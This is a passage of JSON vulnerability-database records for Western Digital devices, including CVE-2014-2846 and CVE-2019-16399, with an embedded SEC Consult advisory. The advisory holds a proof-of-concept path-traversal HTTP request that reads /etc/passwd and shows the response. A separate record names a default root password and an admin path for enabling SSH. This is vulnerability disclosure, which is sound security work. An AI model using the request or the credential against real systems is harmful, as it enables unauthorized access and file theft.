"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-70785",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-70785"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002293"
},
{
"db": "NVD",
"id": "CVE-2014-2846"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-558"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Directory traversal vulnerability in opt/arkeia/wui/htdocs/index.php in the WD Arkeia virtual appliance (AVA) with firmware before 10.2.9 allows remote attackers to read arbitrary files and execute arbitrary PHP code via a ..././ (dot dot dot slash dot slash) in the lang Cookie parameter, as demonstrated by a request to login/doLogin. Western Digital Arkeia Virtual Appliance is prone to a local file-include vulnerability. \nAn attacker can exploit this issue using directory-traversal strings to view files and execute local script code in the context of the web server process. This may allow the attacker to compromise the application; other attacks are also possible. \nWestern Digital Arkeia Virtual Appliance 10.2.7 and prior versions are vulnerable. It supports data protection, deduplication, and direct backup of disks and tapes. SEC Consult Vulnerability Lab Security Advisory \u003c 20140423-0 \u003e\n=======================================================================\n title: Path Traversal/Remote Code Execution\n product: WD Arkeia Virtual Appliance (AVA)\n vulnerable version: All Arkeia Network Backup releases (ASA/APA/AVA) since 7.0.3. \n fixed version: 10.2.9\n CVE number: CVE-2014-2846\n impact: critical\n homepage: http://www.arkeia.com/\n found: 2014-03-05\n by: M. Lucinskij\n SEC Consult Vulnerability Lab\n https://www.sec-consult.com\n=======================================================================\n\nVendor description:\n-------------------\n\"The WD Arkeia virtual appliance (AVA) for backup provides simple, reliable and\naffordable data protection for enterprises seeking to optimize the benefits of\nvirtualization. The AVA offers all the features of the hardware appliance, but\npermits you to use your own choice of hardware.\"\n\nsource:\nhttp://www.arkeia.com/en/products/arkeia-network-backup/backup-server/virtual-appliance\n\n\nBusiness recommendation:\n------------------------\nThe identified path traversal vulnerability can be exploited by unauthenticated\nremote attackers to gain unauthorized access to the WD Arkeia virtual appliance\nand stored backup data. \n\nSEC Consult recommends to restrict access to the web interface of the WD Arkeia\nvirtual appliance using a firewall until a comprehensive security\naudit based on a security source code review has been performed and all\nidentified security deficiencies have been resolved by the affected vendor. \nPath traversal enables attackers access to files and directories outside the\nweb root through relative file paths in the user input. \n\nAn unauthenticated remote attacker can exploit the identified vulnerability in\norder to retrieve arbitrary files from the affected system and execute system\ncommands. \n\n\nProof of concept:\n-----------------\nThe path traversal vulnerability exists in the\n/opt/arkeia/wui/htdocs/index.php script. The value of the \"lang\" cookie\nis not properly checked before including a file using the PHP include()\nfunction. Example of the request that demonstrates the vulnerability by\nretrieving the contents of the /etc/passwd file:\n\nPOST /login/doLogin HTTP/1.0\nHost: $host\nCookie: lang=aaa..././..././..././..././..././..././etc/passwd%00\nContent-Length: 25\nContent-Type: application/x-www-form-urlencoded\n\npassword=bbb\u0026username=aaa\n\nThe response from the affected application:\n\nHTTP/1.1 200 OK\nDate: Wed, 05 Mar 2014 08:29:35 GMT\nServer: Apache/2.2.15 (CentOS)\nX-Powered-By: PHP/5.3.3\nSet-Cookie: PHPSESSID=2ga2peps9eak48ubnkvhf69n40; path=/\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\nPragma: no-cache\nSet-Cookie: subaction=deleted; expires=Tue, 05-Mar-2013 08:29:34 GMT; path=/\nCache-Control: no-cache\nPragma: no-cache\nCharset: UTF-8\nContent-Length: 1217\nConnection: close\nContent-Type: text/html; charset=UTF-8\n\nroot:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\nuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\ngames:x:12:100:games:/usr/games:/sbin/nologin\ngopher:x:13:30:gopher:/var/gopher:/sbin/nologin\nftp:x:14:50:FTP User:/var/ftp:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\nvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin\nntp:x:38:38::/etc/ntp:/sbin/nologin\nsaslauth:x:499:76:\"Saslauthd user\":/var/empty/saslauth:/sbin/nologin\npostfix:x:89:89::/var/spool/postfix:/sbin/nologin\napache:x:48:48:Apache:/var/www:/sbin/nologin\nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\nldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologin\ndhcpd:x:177:177:DHCP server:/:/sbin/nologin\ntcpdump:x:72:72::/:/sbin/nologin\n{\"local\":{\"STATUS\":[\"0\"],\"MESSAGE\":[\"Error code 4, Bad password or\nlogin\"],\"PARAM2\":[\"\"],\"PARAM3\":[null],\"LAST\":[1],\"sessnum\":[null],\"transnum\":[n\null]}}\n\nFurthermore, the identified vulnerability can be also exploited to\nexecute arbitrary PHP code/system commands by including files that\ncontain specially crafted user input. \n\nAccording to the vendor all Arkeia Network Backup releases (ASA/APA/AVA) since\n7.0.3 are affected. \n\n\nVendor contact timeline:\n------------------------\n2014-03-13: Contacting vendor through support@arkeia.com\n2014-03-14: Vendor confirms the vulnerability. \n2014-03-17: Vendor provides a quick fix and a release schedule. \n2014-04-21: Vendor releases a fixed version\n2014-04-23: SEC Consult releases a coordinated security advisory. \n\n\nSolution:\n---------\nUpdate to the most recent version (10.2.9) of Arkeia Network Backup. \n\nMore information can be found at:\nhttp://wiki.arkeia.com/index.php/Path_Traversal_Remote_Code_Execution\n\n\nWorkaround:\n-----------\n\n\nAdvisory URL:\n-------------\nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm\n\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nSEC Consult Vulnerability Lab\n\nSEC Consult\nVienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius\n\nHeadquarter:\nMooslackengasse 17, 1190 Vienna, Austria\nPhone: +43 1 8903043 0\nFax: +43 1 8903043 15\n\nMail: research at sec-consult dot com\nWeb: https://www.sec-consult.com\nBlog: http://blog.sec-consult.com\nTwitter: https://twitter.com/sec_consult\n\nInterested to work with the experts of SEC Consult?\nWrite to career@sec-consult.com\n\nEOF M. Lucinskij / @2014\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-2846"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002293"
},
{
"db": "BID",
"id": "67039"
},
{
"db": "VULHUB",
"id": "VHN-70785"
},
{
"db": "PACKETSTORM",
"id": "126286"
}
],
"trust": 2.07
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-70785",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-70785"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-2846",
"trust": 2.9
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002293",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201404-558",
"trust": 0.7
},
{
"db": "BID",
"id": "67039",
"trust": 0.4
},
{
"db": "PACKETSTORM",
"id": "126286",
"trust": 0.2
},
{
"db": "SEEBUG",
"id": "SSVID-86262",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "33005",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-70785",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-70785"
},
{
"db": "BID",
"id": "67039"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002293"
},
{
"db": "PACKETSTORM",
"id": "126286"
},
{
"db": "NVD",
"id": "CVE-2014-2846"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-558"
}
]
},
"id": "VAR-201404-0435",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-70785"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:53:23.080000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Backup and Recovery Server - Deployed as a Virtual Appliance",
"trust": 0.8,
"url": "http://www.arkeia.com/products/wd-arkeia/backup-server/virtual-appliance"
},
{
"title": "arkeia_appliance_firmware_2-10.2.9",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49656"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-002293"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-558"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-70785"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002293"
},
{
"db": "NVD",
"id": "CVE-2014-2846"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://seclists.org/fulldisclosure/2014/apr/257"
},
{
"trust": 1.8,
"url": "http://wiki.arkeia.com/index.php/path_traversal_remote_code_execution"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/531910/100/0/threaded"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2846"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-2846"
},
{
"trust": 0.1,
"url": "http://www.arkeia.com/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-2846"
},
{
"trust": 0.1,
"url": "http://www.arkeia.com/en/products/arkeia-network-backup/backup-server/virtual-appliance"
},
{
"trust": 0.1,
"url": "https://www.sec-consult.com"
},
{
"trust": 0.1,
"url": "http://blog.sec-consult.com"
},
{
"trust": 0.1,
"url": "https://twitter.com/sec_consult"
},
{
"trust": 0.1,
"url": "https://www.sec-consult.com/en/vulnerability-lab/advisories.htm"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-70785"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002293"
},
{
"db": "PACKETSTORM",
"id": "126286"
},
{
"db": "NVD",
"id": "CVE-2014-2846"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-558"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-70785"
},
{
"db": "BID",
"id": "67039"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002293"
},
{
"db": "PACKETSTORM",
"id": "126286"
},
{
"db": "NVD",
"id": "CVE-2014-2846"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-558"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-04-28T00:00:00",
"db": "VULHUB",
"id": "VHN-70785"
},
{
"date": "2014-04-23T00:00:00",
"db": "BID",
"id": "67039"
},
{
"date": "2014-05-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-002293"
},
{
"date": "2014-04-23T21:28:05",
"db": "PACKETSTORM",
"id": "126286"
},
{
"date": "2014-04-28T14:09:07.877000",
"db": "NVD",
"id": "CVE-2014-2846"
},
{
"date": "2014-04-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201404-558"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-02-24T00:00:00",
"db": "VULHUB",
"id": "VHN-70785"
},
{
"date": "2014-04-23T00:00:00",
"db": "BID",
"id": "67039"
},
{
"date": "2014-05-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-002293"
},
{
"date": "2020-02-24T15:02:18.123000",
"db": "NVD",
"id": "CVE-2014-2846"
},
{
"date": "2020-02-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201404-558"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "126286"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-558"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "WD Arkeia Virtual Appliance Of firmware opt/arkeia/wui/htdocs/index.php Vulnerable to directory traversal",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-002293"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201404-558"
}
],
"trust": 0.6
}
}
VAR-201909-0745
Vulnerability from variot - Updated: 2023-12-18 13:52Western Digital WD My Book World through II 1.02.12 suffers from Broken Authentication, which allows an attacker to access the /admin/ directory without credentials. An attacker can easily enable SSH from /admin/system_advanced.php?lang=en and login with the default root password welc0me. An attacker could exploit this vulnerability to gain access to the /admin/ directory without credentials
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201909-0745",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wd my book",
"scope": "lte",
"trust": 1.0,
"vendor": "westerndigital",
"version": "1.02.12"
},
{
"model": "wd my book",
"scope": "eq",
"trust": 0.8,
"vendor": "western digital",
"version": "1.02.12"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-009501"
},
{
"db": "NVD",
"id": "CVE-2019-16399"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:westerndigital:wd_my_book_firmware:*:*:world_ii:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.02.12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:westerndigital:wd_my_book:-:*:world_ii:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-16399"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Noman Riffat",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201909-867"
}
],
"trust": 0.6
},
"cve": "CVE-2019-16399",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2019-16399",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-148541",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-16399",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-16399",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-201909-867",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-148541",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-148541"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-009501"
},
{
"db": "NVD",
"id": "CVE-2019-16399"
},
{
"db": "CNNVD",
"id": "CNNVD-201909-867"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Western Digital WD My Book World through II 1.02.12 suffers from Broken Authentication, which allows an attacker to access the /admin/ directory without credentials. An attacker can easily enable SSH from /admin/system_advanced.php?lang=en and login with the default root password welc0me. An attacker could exploit this vulnerability to gain access to the /admin/ directory without credentials",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-16399"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-009501"
},
{
"db": "VULHUB",
"id": "VHN-148541"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "PACKETSTORM",
"id": "154524",
"trust": 2.5
},
{
"db": "NVD",
"id": "CVE-2019-16399",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2019-009501",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201909-867",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "47399",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-148541",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-148541"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-009501"
},
{
"db": "NVD",
"id": "CVE-2019-16399"
},
{
"db": "CNNVD",
"id": "CNNVD-201909-867"
}
]
},
"id": "VAR-201909-0745",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-148541"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:52:13.213000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://wd.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-009501"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-798",
"trust": 1.1
},
{
"problemtype": "CWE-287",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-148541"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-009501"
},
{
"db": "NVD",
"id": "CVE-2019-16399"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://packetstormsecurity.com/files/154524/western-digital-my-book-world-ii-nas-1.02.12-hardcoded-credential.html"
},
{
"trust": 1.7,
"url": "https://gist.github.com/pak0s/22ad6bae26198ebcd137b61adb6fcfe6"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16399"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-16399"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/download/47399"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-148541"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-009501"
},
{
"db": "NVD",
"id": "CVE-2019-16399"
},
{
"db": "CNNVD",
"id": "CNNVD-201909-867"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-148541"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-009501"
},
{
"db": "NVD",
"id": "CVE-2019-16399"
},
{
"db": "CNNVD",
"id": "CNNVD-201909-867"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-09-18T00:00:00",
"db": "VULHUB",
"id": "VHN-148541"
},
{
"date": "2019-09-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-009501"
},
{
"date": "2019-09-18T14:15:11.123000",
"db": "NVD",
"id": "CVE-2019-16399"
},
{
"date": "2019-09-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201909-867"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-148541"
},
{
"date": "2019-09-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-009501"
},
{
"date": "2020-08-24T17:37:01.140000",
"db": "NVD",
"id": "CVE-2019-16399"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201909-867"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201909-867"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Western Digital WD My Book World II Authentication vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-009501"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201909-867"
}
],
"trust": 0.6
}
}
VAR-201806-0898
Vulnerability from variot - Updated: 2023-12-18 13:43The web server on Western Digital TV Media Player 1.03.07 and TV Live Hub 3.12.13 allow unauthenticated remote attackers to execute arbitrary code or cause denial of service via crafted HTTP requests to toServerValue.cgi
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
